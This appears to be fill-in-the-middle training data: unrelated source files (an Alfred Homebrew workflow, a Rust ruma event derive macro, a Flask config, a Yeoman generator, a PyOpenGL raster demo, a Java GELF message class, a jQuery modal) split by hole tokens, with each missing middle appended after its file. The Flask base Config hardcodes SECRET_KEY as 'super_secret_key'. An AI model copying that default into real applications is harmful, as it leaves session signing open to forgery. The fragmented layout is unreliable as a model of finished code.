wf.add_item(formula, 'Open formula on GitHub.', arg='brew info --github %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('pin'): for formula in filter_installed_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Pin formula.', arg='brew pin %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) # delete cached file wf.cache_data('brew_pinned_formulae', None) elif query and query.startswith('unpin'): for formula in filter_pinned_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Unpin formula.', arg='brew unpin %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) # delete cached file wf.cache_data('brew_pinned_formulae', None) elif query and query.startswith('cat'): for formula in filter_all_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Display the source to this formula.', arg='brew cat %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('outdated'): for formula in filter_outdated_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Upgrade formula.', arg='brew upgrade %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('info'): wf.add_item(get_info(), autocomplete='', icon=helpers.get_icon(wf, 'info')) elif query and query.startswith('commands'): for command in get_commands(wf, query): wf.add_item(command, 'Run this command.', arg='brew %s' % command, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) elif query and query.startswith('config'): helpers.edit_settings(wf) wf.add_item('`settings.json` has been opened.', autocomplete='', icon=helpers.get_icon(wf, 'info')) else: actions = brew_actions.ACTIONS if len(wf.cached_data('brew_pinned_formulae', get_pinned_formulae, max_age=3600)) > 0: actions.append({ 'name': 'Unpin', 'description': 'Unpin formula.', 'autocomplete': 'unpin ', 'arg': '', 'valid': False, }) # filter actions by query if query:<|fim▁hole|> actions = wf.filter(query, actions, key=helpers.search_key_for_action, match_on=MATCH_SUBSTRING) if len(actions) > 0: for action in actions: wf.add_item(action['name'], action['description'], uid=action['name'], autocomplete=action['autocomplete'], arg=action['arg'], valid=action['valid'], icon=helpers.get_icon(wf, 'chevron-right')) else: wf.add_item('No action found for "%s"' % query, autocomplete='', icon=helpers.get_icon(wf, 'info')) if len(wf._items) == 0: query_name = query[query.find(' ') + 1:] wf.add_item('No formula found for "%s"' % query_name, autocomplete='%s ' % query[:query.find(' ')], icon=helpers.get_icon(wf, 'info')) wf.send_feedback() # refresh cache cmd = ['/usr/bin/python', wf.workflowfile('brew_refresh.py')] run_in_background('brew_refresh', cmd) if __name__ == '__main__': wf = Workflow(update_settings={'github_slug': GITHUB_SLUG}) sys.exit(wf.run(main))<|fim▁end|>
<|file_name|>media_tag.py<|end_file_name|><|fim▁begin|>import enum from typing import Dict, Optional, Set @enum.unique class MediaTag(enum.IntEnum): # ndb keys are based on these! Don't change! CHAIRMANS_VIDEO = 0 CHAIRMANS_PRESENTATION = 1 CHAIRMANS_ESSAY = 2 MEDIA_TAGS: Set[MediaTag] = {t for t in MediaTag} TAG_NAMES: Dict[MediaTag, str] = { MediaTag.CHAIRMANS_VIDEO: "Chairman's Video", MediaTag.CHAIRMANS_PRESENTATION: "Chairman's Presentation", MediaTag.CHAIRMANS_ESSAY: "Chairman's Essay", } TAG_URL_NAMES: Dict[MediaTag, str] = { MediaTag.CHAIRMANS_VIDEO: "chairmans_video", MediaTag.CHAIRMANS_PRESENTATION: "chairmans_presentation", MediaTag.CHAIRMANS_ESSAY: "chairmans_essay", } CHAIRMANS_TAGS: Set[MediaTag] = { MediaTag.CHAIRMANS_VIDEO, MediaTag.CHAIRMANS_PRESENTATION, MediaTag.CHAIRMANS_ESSAY, } <|fim▁hole|> return inversed[url_name] else: return None<|fim▁end|>
def get_enum_from_url(url_name: str) -> Optional[MediaTag]: inversed = {v: k for k, v in TAG_URL_NAMES.items()} if url_name in inversed:
<|file_name|>event.rs<|end_file_name|><|fim▁begin|>//! Implementation of the top level `*Event` derive macro. use proc_macro2::{Span, TokenStream}; use quote::{format_ident, quote}; use syn::{ parse_quote, Data, DataStruct, DeriveInput, Field, Fields, FieldsNamed, GenericParam, Meta, MetaList, NestedMeta, }; use super::{ event_parse::{to_kind_variation, EventKind, EventKindVariation}, util::is_non_stripped_room_event, }; use crate::{import_ruma_common, util::to_camel_case}; /// Derive `Event` macro code generation. pub fn expand_event(input: DeriveInput) -> syn::Result<TokenStream> { let ruma_common = import_ruma_common(); let ident = &input.ident; let (kind, var) = to_kind_variation(ident).ok_or_else(|| { syn::Error::new_spanned(ident, "not a valid ruma event struct identifier") })?; let fields: Vec<_> = if let Data::Struct(DataStruct { fields: Fields::Named(FieldsNamed { named, .. }),<|fim▁hole|> .. }) = &input.data { if !named.iter().any(|f| f.ident.as_ref().unwrap() == "content") { return Err(syn::Error::new( Span::call_site(), "struct must contain a `content` field", )); } named.iter().cloned().collect() } else { return Err(syn::Error::new_spanned( input.ident, "the `Event` derive only supports structs with named fields", )); }; let mut res = TokenStream::new(); res.extend(expand_serialize_event(&input, var, &fields, &ruma_common)); res.extend(expand_deserialize_event(&input, kind, var, &fields, &ruma_common)?); if var.is_sync() { res.extend(expand_sync_from_into_full(&input, kind, var, &fields, &ruma_common)); } if matches!(kind, EventKind::MessageLike | EventKind::State) && matches!(var, EventKindVariation::Full | EventKindVariation::Sync) { res.extend(expand_redact_event(&input, kind, var, &fields, &ruma_common)); } if is_non_stripped_room_event(kind, var) { res.extend(expand_eq_ord_event(&input)); } Ok(res) } fn expand_serialize_event( input: &DeriveInput, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> TokenStream { let serde = quote! { #ruma_common::exports::serde }; let ident = &input.ident; let (impl_gen, ty_gen, where_clause) = input.generics.split_for_impl(); let serialize_fields: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); if name == "content" && var.is_redacted() { quote! { if #ruma_common::events::RedactedEventContent::has_serialize_fields(&self.content) { state.serialize_field("content", &self.content)?; } } } else if name == "unsigned" { quote! { if !self.unsigned.is_empty() { state.serialize_field("unsigned", &self.unsigned)?; } } } else { let name_s = name.to_string(); match &field.ty { syn::Type::Path(syn::TypePath { path: syn::Path { segments, .. }, .. }) if segments.last().unwrap().ident == "Option" => { quote! { if let Some(content) = self.#name.as_ref() { state.serialize_field(#name_s, content)?; } } } _ => quote! { state.serialize_field(#name_s, &self.#name)?; }, } } }) .collect(); quote! { #[automatically_derived] impl #impl_gen #serde::ser::Serialize for #ident #ty_gen #where_clause { fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error> where S: #serde::ser::Serializer, { use #serde::ser::{SerializeStruct as _, Error as _}; let event_type = #ruma_common::events::EventContent::event_type(&self.content); let mut state = serializer.serialize_struct(stringify!(#ident), 7)?; state.serialize_field("type", event_type)?; #( #serialize_fields )* state.end() } } } } fn expand_deserialize_event( input: &DeriveInput, _kind: EventKind, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> syn::Result<TokenStream> { let serde = quote! { #ruma_common::exports::serde }; let serde_json = quote! { #ruma_common::exports::serde_json }; let ident = &input.ident; // we know there is a content field already let content_type = &fields .iter() // we also know that the fields are named and have an ident .find(|f| f.ident.as_ref().unwrap() == "content") .unwrap() .ty; let (impl_generics, ty_gen, where_clause) = input.generics.split_for_impl(); let is_generic = !input.generics.params.is_empty(); let enum_variants: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); to_camel_case(name) }) .collect(); let deserialize_var_types: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); let ty = &field.ty; if name == "content" || name == "prev_content" { if is_generic { quote! { ::std::boxed::Box<#serde_json::value::RawValue> } } else { quote! { #content_type } } } else { #[allow(unused_mut)] let mut ty = quote! { #ty }; #[cfg(feature = "compat")] if matches!(_kind, EventKind::State) && name == "unsigned" { match var { EventKindVariation::Full | EventKindVariation::Sync => { ty = quote! { #ruma_common::events::UnsignedWithPrevContent }; } EventKindVariation::Redacted | EventKindVariation::RedactedSync => { ty = quote! { #ruma_common::events::RedactedUnsignedWithPrevContent }; } EventKindVariation::Stripped | EventKindVariation::Initial => { unreachable!() } } } ty } }) .collect(); let ok_or_else_fields: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); Ok(if name == "content" { if is_generic && var.is_redacted() { quote! { let content = match C::has_deserialize_fields() { #ruma_common::events::HasDeserializeFields::False => { C::empty(&event_type).map_err(A::Error::custom)? }, #ruma_common::events::HasDeserializeFields::True => { let json = content.ok_or_else( || #serde::de::Error::missing_field("content"), )?; C::from_parts(&event_type, &json).map_err(A::Error::custom)? }, #ruma_common::events::HasDeserializeFields::Optional => { let json = content.unwrap_or( #serde_json::value::RawValue::from_string("{}".to_owned()) .unwrap() ); C::from_parts(&event_type, &json).map_err(A::Error::custom)? }, }; } } else if is_generic { quote! { let content = { let json = content .ok_or_else(|| #serde::de::Error::missing_field("content"))?; C::from_parts(&event_type, &json).map_err(A::Error::custom)? }; } } else { quote! { let content = content.ok_or_else( || #serde::de::Error::missing_field("content"), )?; } } } else if name == "prev_content" { if is_generic { #[allow(unused_mut)] let mut res = quote! { let prev_content = prev_content.map(|json| { C::from_parts(&event_type, &json).map_err(A::Error::custom) }).transpose()?; }; #[cfg(feature = "compat")] if let EventKind::State = _kind { res = quote! { let prev_content = prev_content .or_else(|| unsigned.as_mut().and_then(|u| u.prev_content.take())); #res }; }; res } else { TokenStream::new() } } else if name == "unsigned" { #[allow(unused_mut)] let mut res = quote! { let unsigned = unsigned.unwrap_or_default(); }; #[cfg(feature = "compat")] if matches!(_kind, EventKind::State) { res = quote! { let unsigned = unsigned.map_or_else( ::std::default::Default::default, ::std::convert::From::from, ); }; } res } else { let attrs: Vec<_> = field .attrs .iter() .filter(|a| a.path.is_ident("ruma_event")) .map(|a| a.parse_meta()) .collect::<syn::Result<_>>()?; let has_default_attr = attrs.iter().any(|a| { matches!( a, Meta::List(MetaList { nested, .. }) if nested.iter().any(|n| { matches!(n, NestedMeta::Meta(Meta::Path(p)) if p.is_ident("default")) }) ) }); if has_default_attr { quote! { let #name = #name.unwrap_or_default(); } } else { quote! { let #name = #name.ok_or_else(|| { #serde::de::Error::missing_field(stringify!(#name)) })?; } } }) }) .collect::<syn::Result<_>>()?; let field_names: Vec<_> = fields.iter().flat_map(|f| &f.ident).collect(); let deserialize_impl_gen = if is_generic { let gen = &input.generics.params; quote! { <'de, #gen> } } else { quote! { <'de> } }; let deserialize_phantom_type = if is_generic { quote! { ::std::marker::PhantomData } } else { quote! {} }; Ok(quote! { #[automatically_derived] impl #deserialize_impl_gen #serde::de::Deserialize<'de> for #ident #ty_gen #where_clause { fn deserialize<D>(deserializer: D) -> Result<Self, D::Error> where D: #serde::de::Deserializer<'de>, { #[derive(#serde::Deserialize)] #[serde(field_identifier, rename_all = "snake_case")] enum Field { // since this is represented as an enum we have to add it so the JSON picks it // up Type, #( #enum_variants, )* #[serde(other)] Unknown, } /// Visits the fields of an event struct to handle deserialization of /// the `content` and `prev_content` fields. struct EventVisitor #impl_generics (#deserialize_phantom_type #ty_gen); #[automatically_derived] impl #deserialize_impl_gen #serde::de::Visitor<'de> for EventVisitor #ty_gen #where_clause { type Value = #ident #ty_gen; fn expecting( &self, formatter: &mut ::std::fmt::Formatter<'_>, ) -> ::std::fmt::Result { write!(formatter, "struct implementing {}", stringify!(#content_type)) } fn visit_map<A>(self, mut map: A) -> Result<Self::Value, A::Error> where A: #serde::de::MapAccess<'de>, { use #serde::de::Error as _; let mut event_type: Option<String> = None; #( let mut #field_names: Option<#deserialize_var_types> = None; )* while let Some(key) = map.next_key()? { match key { Field::Unknown => { let _: #serde::de::IgnoredAny = map.next_value()?; }, Field::Type => { if event_type.is_some() { return Err(#serde::de::Error::duplicate_field("type")); } event_type = Some(map.next_value()?); } #( Field::#enum_variants => { if #field_names.is_some() { return Err(#serde::de::Error::duplicate_field( stringify!(#field_names), )); } #field_names = Some(map.next_value()?); } )* } } let event_type = event_type.ok_or_else(|| #serde::de::Error::missing_field("type"))?; #( #ok_or_else_fields )* Ok(#ident { #( #field_names ),* }) } } deserializer.deserialize_map(EventVisitor(#deserialize_phantom_type)) } } }) } fn expand_redact_event( input: &DeriveInput, kind: EventKind, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> TokenStream { let redacted_type = kind.to_event_ident(var.to_redacted()); let redacted_content_trait = format_ident!("{}Content", kind.to_event_ident(EventKindVariation::Redacted)); let ident = &input.ident; let mut generics = input.generics.clone(); if generics.params.is_empty() { return TokenStream::new(); } assert_eq!(generics.params.len(), 1, "expected one generic parameter"); let ty_param = match &generics.params[0] { GenericParam::Type(ty) => ty.ident.clone(), _ => panic!("expected a type parameter"), }; let where_clause = generics.make_where_clause(); where_clause.predicates.push(parse_quote! { #ty_param: #ruma_common::events::RedactContent }); where_clause.predicates.push(parse_quote! { <#ty_param as #ruma_common::events::RedactContent>::Redacted: #ruma_common::events::#redacted_content_trait }); let (impl_generics, ty_gen, where_clause) = generics.split_for_impl(); let fields = fields.iter().filter_map(|field| { let ident = field.ident.as_ref().unwrap(); if ident == "content" || ident == "prev_content" { None } else if ident == "unsigned" { Some(quote! { unsigned: #ruma_common::events::RedactedUnsigned::new_because( ::std::boxed::Box::new(redaction), ) }) } else { Some(quote! { #ident: self.#ident }) } }); quote! { #[automatically_derived] impl #impl_generics #ruma_common::events::Redact for #ident #ty_gen #where_clause { type Redacted = #ruma_common::events::#redacted_type< <#ty_param as #ruma_common::events::RedactContent>::Redacted, >; fn redact( self, redaction: #ruma_common::events::room::redaction::SyncRoomRedactionEvent, version: &#ruma_common::RoomVersionId, ) -> Self::Redacted { let content = #ruma_common::events::RedactContent::redact(self.content, version); #ruma_common::events::#redacted_type { content, #(#fields),* } } } } } fn expand_sync_from_into_full( input: &DeriveInput, kind: EventKind, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> TokenStream { let ident = &input.ident; let full_struct = kind.to_event_ident(var.to_full()); let (impl_generics, ty_gen, where_clause) = input.generics.split_for_impl(); let fields: Vec<_> = fields.iter().flat_map(|f| &f.ident).collect(); quote! { #[automatically_derived] impl #impl_generics ::std::convert::From<#full_struct #ty_gen> for #ident #ty_gen #where_clause { fn from(event: #full_struct #ty_gen) -> Self { let #full_struct { #( #fields, )* .. } = event; Self { #( #fields, )* } } } #[automatically_derived] impl #impl_generics #ident #ty_gen #where_clause { /// Convert this sync event into a full event, one with a room_id field. pub fn into_full_event( self, room_id: ::std::boxed::Box<#ruma_common::RoomId>, ) -> #full_struct #ty_gen { let Self { #( #fields, )* } = self; #full_struct { #( #fields, )* room_id, } } } } } fn expand_eq_ord_event(input: &DeriveInput) -> TokenStream { let ident = &input.ident; let (impl_gen, ty_gen, where_clause) = input.generics.split_for_impl(); quote! { #[automatically_derived] impl #impl_gen ::std::cmp::PartialEq for #ident #ty_gen #where_clause { /// Checks if two `EventId`s are equal. fn eq(&self, other: &Self) -> ::std::primitive::bool { self.event_id == other.event_id } } #[automatically_derived] impl #impl_gen ::std::cmp::Eq for #ident #ty_gen #where_clause {} #[automatically_derived] impl #impl_gen ::std::cmp::PartialOrd for #ident #ty_gen #where_clause { /// Compares `EventId`s and orders them lexicographically. fn partial_cmp(&self, other: &Self) -> ::std::option::Option<::std::cmp::Ordering> { self.event_id.partial_cmp(&other.event_id) } } #[automatically_derived] impl #impl_gen ::std::cmp::Ord for #ident #ty_gen #where_clause { /// Compares `EventId`s and orders them lexicographically. fn cmp(&self, other: &Self) -> ::std::cmp::Ordering { self.event_id.cmp(&other.event_id) } } } }<|fim▁end|>
<|file_name|>config.py<|end_file_name|><|fim▁begin|>import os class Config(object): DEBUG = False<|fim▁hole|> class ProductionConfig(Config): DEBUG = False SECRET_KEY = os.environ['SECRET_KEY'] class DevelopmentConfig(Config): DEVELOPMENT = True DEBUG = True class TestingConfig(Config): TESTING = True<|fim▁end|>
TESTING = False CSRF_ENABLED = True SECRET_KEY = "super_secret_key" SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
<|file_name|>index.js<|end_file_name|><|fim▁begin|>'use strict'; var path = require('path'); var generators = require('yeoman-generator'); var yaml = require('js-yaml'); var _ = require('lodash'); var chalk = require('chalk'); var GitHub = require('github'); module.exports = generators.Base.extend({ _logHeading: function (msg) { this.log("\n"); this.log.writeln(chalk.bold(msg)); this.log.writeln(chalk.bold('-------------------------------')); }, _listPlugins: function () { var github = new GitHub({ version: '3.0.0' }); github.search.repos({ q: 'wok-plugin+in:name' }, function (err, response) { console.log(response.items.length); }); }, // The name `constructor` is important here constructor: function () { // Calling the super constructor is important so our generator is correctly set up generators.Base.apply(this, arguments); this.answers = {}; }, askForProject: function () { var done = this.async(); var _utils = this._; this._logHeading('Collecting new project infos...'); var prompts = [{ type: 'text', name: 'name', message: 'Project name', 'default': 'awesome-wok-project', filter: function (value) { return _utils.slugify(value) } }, { type: 'text', name: 'description', message: 'Project description', 'default': 'Awesome WOK Project' }, { type: 'text', name: 'author', message: 'Author', 'default': this.user.git.name() }, { type: 'text', name: 'license', message: 'License', 'default': 'MIT' }]; this.prompt(prompts, function (answers) { this.answers.projectData = answers; done();<|fim▁hole|> }.bind(this)); }, askForFolders: function () { var done = this.async(); var _utils = this._; this._logHeading('Filesystem setup...'); var prompts = [ { type: 'text', name: 'www', message: 'Public assets folder', 'default': 'www', filter: function (value) { return _utils.slugify(value) } }]; this.prompt(prompts, function (answers) { answers.rsync = answers.www; this.answers.folders = answers; done(); }.bind(this)); }, fetchRepo: function () { var done = this.async(); this.remote('fevrcoding', 'wok', 'master', function (err, remote, files) { if (err) { //TODO manage error this.log.error('Unable to download latest version of https://github.com/fevrcoding/wok'); return false; } this.wokRepo = remote; this.wokFiles = files; done(); }.bind(this)); //this._listPlugins(); }, copyFiles: function () { var remote = this.wokRepo; var files = this.wokFiles; //copy main application folder remote.directory('application', 'application'); //build folder remote.dest.mkdir('build'); //copy unchanged configuration files ['hosts.yml', 'properties.yml'].forEach(function (filename) { var fullpath = path.join('build', 'grunt-config', filename); remote.copy(fullpath, fullpath); }); //copy unchanged files ['build/Gruntfile.js', 'build/compass.rb', 'bower.json', 'Gemfile'].forEach(function (filepath) { remote.copy(filepath, filepath); }); //copy dot files files.filter(function (path) { return path.indexOf('.') === 0 && path !== '.bowerrc'; }).forEach(function (el) { remote.copy(el, el); }); }, package: function () { var pkg = this.wokRepo.src.readJSON('package.json'); pkg = _.extend(pkg || {}, { version: '0.0.1', contributors: [] }, this.answers.projectData); this.wokRepo.dest.write('package.json', JSON.stringify(pkg, null, 4)); return pkg; }, config: function (remote) { var remote = this.wokRepo; var pathCfg = yaml.safeLoad(remote.src.read('build/grunt-config/paths.yml')); var defaultPublic = pathCfg.www; pathCfg = _.extend(pathCfg, this.answers.folders); remote.dest.write('build/grunt-config/paths.yml', yaml.safeDump(pathCfg)); //public www data to destination public folder remote.directory(defaultPublic, pathCfg.www); //write .bowerrc remote.dest.write('.bowerrc', JSON.stringify({directory: pathCfg.www + '/vendor'}, null, 4)); return pathCfg; }, readme: function () { //generate an empty readme file this.wokRepo.dest.write('README.md', '#' + this.answers.projectDescription + "\n\n"); }, install: function () { if (!this.options['skip-install']) { this.spawnCommand('bundler', ['install']); this.installDependencies({ skipMessage: true }); } var template = _.template('\n\nI\'m all done. ' + '<%= skipInstall ? "Just run" : "Running" %> <%= commands %> ' + '<%= skipInstall ? "" : "for you " %>to install the required dependencies.' + '<% if (!skipInstall) { %> If this fails, try running the command yourself.<% } %>\n\n' ); this.log(template({ skipInstall: this.options['skip-install'], commands: chalk.yellow.bold(['bower install', 'npm install', 'bundler install'].join(' & ')) })); } });<|fim▁end|>
<|file_name|>main_raster.py<|end_file_name|><|fim▁begin|>import time from PyQt4 import QtGui, QtCore, QtOpenGL from PyQt4.QtOpenGL import QGLWidget import OpenGL.GL as gl import OpenGL.arrays.vbo as glvbo import numpy as np import raster import slider import draw_texture import qt_helpers raster_width = 1024 raster_height = 64 raster_n_neurons = 64 spikes_per_frame = 5 class GLPlotWidget(QGLWidget): # default window size width, height = 600, 600 t_last_msg = time.time() spike_count = 0 last_time = None def initializeGL(self): # program for drawing spikes self.raster = raster.RasterProgram(raster_width, raster_height, raster_n_neurons) self.raster.link() # program for fading sparkleplot self.slider = slider.SlideProgram(raster_width, raster_height) self.slider.link() # program for rendering a texture on the screen self.draw_texture = draw_texture.DrawTextureProgram() self.draw_texture.link() def paintGL(self): now = time.time()<|fim▁hole|> decay = 0.0 self.dt = None else: dt = now - self.last_time if self.dt is None: self.dt = dt else: #self.dt = dt self.dt = (0.9) * self.dt + (0.1) * dt self.last_time = now if self.dt is not None: self.slider.swap_frame_buffer(int(self.dt/0.001)) self.slider.paint_slid() #data = self.data data = np.random.randint(raster_n_neurons, size=spikes_per_frame).astype('int32') # generate spike data self.spike_count += len(data) # paint the spikes onto the sparkle plot self.slider.swap_frame_buffer(0, False) self.raster.paint_spikes(data) # switch to rendering on the screen gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0) gl.glViewport(0, 0, self.width, self.height) # draw the sparkle plot on the screen self.draw_texture.paint(self.slider.get_current_texture()) # print out spike rate now = time.time() if now > self.t_last_msg + 1: dt = now - self.t_last_msg rate = self.spike_count * 0.000001 / dt print 'Mspikes per second = %g' % rate self.spike_count = 0 self.t_last_msg = now # flag a redraw self.update() def resizeGL(self, width, height): """Called upon window resizing: reinitialize the viewport.""" # update the window size self.width, self.height = width, height # paint within the whole window gl.glViewport(0, 0, width, height) if __name__ == '__main__': # define a Qt window with an OpenGL widget inside it class TestWindow(QtGui.QMainWindow): def __init__(self): super(TestWindow, self).__init__() # initialize the GL widget self.widget = GLPlotWidget() # put the window at the screen position (100, 100) self.setGeometry(100, 100, self.widget.width, self.widget.height) self.setCentralWidget(self.widget) self.show() # show the window win = qt_helpers.create_window(TestWindow)<|fim▁end|>
if self.last_time is None:
<|file_name|>GelfMessage.java<|end_file_name|><|fim▁begin|>/*Copyright (c) 2011 Anton Yakimov. GELF created by Lennart Koopmann, Aleksey Palazhchenko. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package org.graylog2; import org.json.simple.JSONValue; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStream; import java.io.UnsupportedEncodingException; import java.math.BigDecimal; import java.nio.ByteBuffer; import java.util.*; import java.util.zip.GZIPOutputStream; public class GelfMessage { private static final String ID_NAME = "id"; private static final String GELF_VERSION = "1.0"; private static final byte[] GELF_CHUNKED_ID = new byte[]{0x1e, 0x0f}; private static final int MAXIMUM_CHUNK_SIZE = 1420; private static final BigDecimal TIME_DIVISOR = new BigDecimal(1000); private String version = GELF_VERSION; private String host; private byte[] hostBytes = lastFourAsciiBytes("none"); private String shortMessage; private String fullMessage; private long javaTimestamp; private String level; private String facility = "gelf-java"; private String line; private String file; private Map<String, Object> additonalFields = new HashMap<String, Object>(); public GelfMessage() { } // todo: merge these constructors. public GelfMessage(String shortMessage, String fullMessage, Date timestamp, String level) { this.shortMessage = shortMessage; this.fullMessage = fullMessage; this.javaTimestamp = timestamp.getTime(); this.level = level; } public GelfMessage(String shortMessage, String fullMessage, Long timestamp, String level, String line, String file) { this.shortMessage = shortMessage; this.fullMessage = fullMessage; this.javaTimestamp = timestamp; this.level = level; this.line = line; this.file = file; } public String toJson() { Map<String, Object> map = new HashMap<String, Object>(); map.put("version", getVersion()); map.put("host", getHost()); map.put("short_message", getShortMessage()); map.put("full_message", getFullMessage()); map.put("timestamp", getTimestamp()); map.put("level", getLevel()); map.put("facility", getFacility()); if( null != getFile() ) { map.put("file", getFile()); } if( null != getLine() ) { map.put("line", getLine()); } for (Map.Entry<String, Object> additionalField : additonalFields.entrySet()) { if (!ID_NAME.equals(additionalField.getKey())) { map.put("_" + additionalField.getKey(), additionalField.getValue()); } } return JSONValue.toJSONString(map); } public List<byte[]> toDatagrams() { byte[] messageBytes = gzipMessage(toJson()); List<byte[]> datagrams = new ArrayList<byte[]>(); if (messageBytes.length > MAXIMUM_CHUNK_SIZE) { sliceDatagrams(messageBytes, datagrams); } else { datagrams.add(messageBytes); } return datagrams; } private void sliceDatagrams(byte[] messageBytes, List<byte[]> datagrams) { int messageLength = messageBytes.length; byte[] messageId = ByteBuffer.allocate(8) .putInt((int) System.currentTimeMillis()) // 4 least-significant-bytes of the time in millis .put(hostBytes) // 4 least-significant-bytes of the host .array(); int num = ((Double) Math.ceil((double) messageLength / MAXIMUM_CHUNK_SIZE)).intValue(); for (int idx = 0; idx < num; idx++) { byte[] header = concatByteArray(GELF_CHUNKED_ID, concatByteArray(messageId, new byte[]{(byte) idx, (byte) num})); int from = idx * MAXIMUM_CHUNK_SIZE; int to = from + MAXIMUM_CHUNK_SIZE; if (to >= messageLength) { to = messageLength; } byte[] datagram = concatByteArray(header, Arrays.copyOfRange(messageBytes, from, to)); datagrams.add(datagram); } } private byte[] gzipMessage(String message) { ByteArrayOutputStream bos = new ByteArrayOutputStream(); try { GZIPOutputStream stream = new GZIPOutputStream(bos); stream.write(message.getBytes()); stream.finish(); stream.close(); byte[] zipped = bos.toByteArray(); bos.close(); return zipped; } catch (IOException e) { return null; } } private byte[] lastFourAsciiBytes(String host) { final String shortHost = host.length() >= 4 ? host.substring(host.length() - 4) : host; try { return shortHost.getBytes("ASCII"); } catch (UnsupportedEncodingException e) { throw new RuntimeException("JVM without ascii support?", e); } } public String getVersion() { return version; } public void setVersion(String version) { this.version = version; } public String getHost() { return host; } public void setHost(String host) { this.host = host; this.hostBytes = lastFourAsciiBytes(host); } public String getShortMessage() { return shortMessage; } public void setShortMessage(String shortMessage) { this.shortMessage = shortMessage; } public String getFullMessage() { return fullMessage; } public void setFullMessage(String fullMessage) { this.fullMessage = fullMessage; } public String getTimestamp() { return new BigDecimal(javaTimestamp).divide(TIME_DIVISOR).toPlainString(); } public Long getJavaTimestamp() { return javaTimestamp; } public void setJavaTimestamp(long javaTimestamp) { this.javaTimestamp = javaTimestamp; } public String getLevel() { return level; } public void setLevel(String level) { this.level = level; } public String getFacility() { return facility; } public void setFacility(String facility) { this.facility = facility; } public String getLine() { return line; } public void setLine(String line) { this.line = line; } public String getFile() { return file; } public void setFile(String file) { this.file = file; } public GelfMessage addField(String key, String value) { getAdditonalFields().put(key, value); return this; } public GelfMessage addField(String key, Object value) { getAdditonalFields().put(key, value); return this; } public Map<String, Object> getAdditonalFields() { return additonalFields; } public void setAdditonalFields(Map<String, Object> additonalFields) { this.additonalFields = additonalFields;<|fim▁hole|> return !isEmpty(version) && !isEmpty(host) && !isEmpty(shortMessage) && !isEmpty(facility); } public boolean isEmpty(String str) { return str == null || "".equals(str.trim()); } private byte[] concatByteArray(byte[] first, byte[] second) { byte[] result = Arrays.copyOf(first, first.length + second.length); System.arraycopy(second, 0, result, first.length, second.length); return result; } }<|fim▁end|>
} public boolean isValid() {
<|file_name|>modal.js<|end_file_name|><|fim▁begin|>!function(namespace) { 'use strict'; function Modal(elem, params) { this.$element = jQuery(elem); this.params = params || {}; this.cssReadyElement = this.params.cssReadyElement || 'JS-Modal-ready'; this.cssActiveElement = this.params.cssActiveElement || 'JS-Modal-active'; this.__construct(); } Modal.prototype.__construct = function __construct() { this.$box = this.$element.find('.JS-Modal-Box'); this.$close = this.$element.find('.JS-Modal-Close'); this.$title = this.$element.find('.JS-Modal-Title'); this.$container = this.$element.find('.JS-Modal-Container'); this._init(); }; Modal.prototype._init = function _init() { var _this = this; this.$close.on('click.JS-Modal', function() { _this._close.apply(_this, []); }); $('body').on("keyup", function(e) { if ((e.keyCode == 27)) { _this._close.apply(_this, []); } }); $('.JS-Gannt-Modal').click(function() { if (_this.$element.hasClass('JS-Modal-active')) _this._close.apply(_this, []); }); $('.JS-Modal-Box').click(function(event){ event.stopPropagation(); }); /* API. Events */ this.$element.on('modal:setContent', function(e, data) { _this.setContent.apply(_this, [data]); }); this.$element.on('modal:open', function() { _this.open.apply(_this, []); }); this.$element.on('modal:close', function() { _this.close.apply(_this, []); }); this.$element.on('modal:clear', function() { _this.clear.apply(_this, []); }); this._ready(); } ; Modal.prototype._ready = function _ready() { this.$element .addClass(this.cssReadyElement) .addClass('JS-Modal-ready'); }; Modal.prototype._setContent = function _setContent(content) { this.$container.html(content); }; Modal.prototype._open = function _open() { if (!this.$element.hasClass('JS-Modal-active')) { this.$element .addClass(this.cssActiveElement) .addClass('JS-Modal-active') } }; Modal.prototype._close = function _close() { if (this.$element.hasClass('JS-Modal-active')) { this.$element .removeClass(this.cssActiveElement) .removeClass('JS-Modal-active'); } }; Modal.prototype._clear = function _clear() { }; /* API. Methods */ Modal.prototype.setContent = function setContent(content) { if (!arguments.length) { return false; } this._setContent(content); }; Modal.prototype.open = function open() { this._open(); }; <|fim▁hole|> Modal.prototype.clear = function clear() { this._clear(); }; namespace.Modal = Modal; }(this);<|fim▁end|>
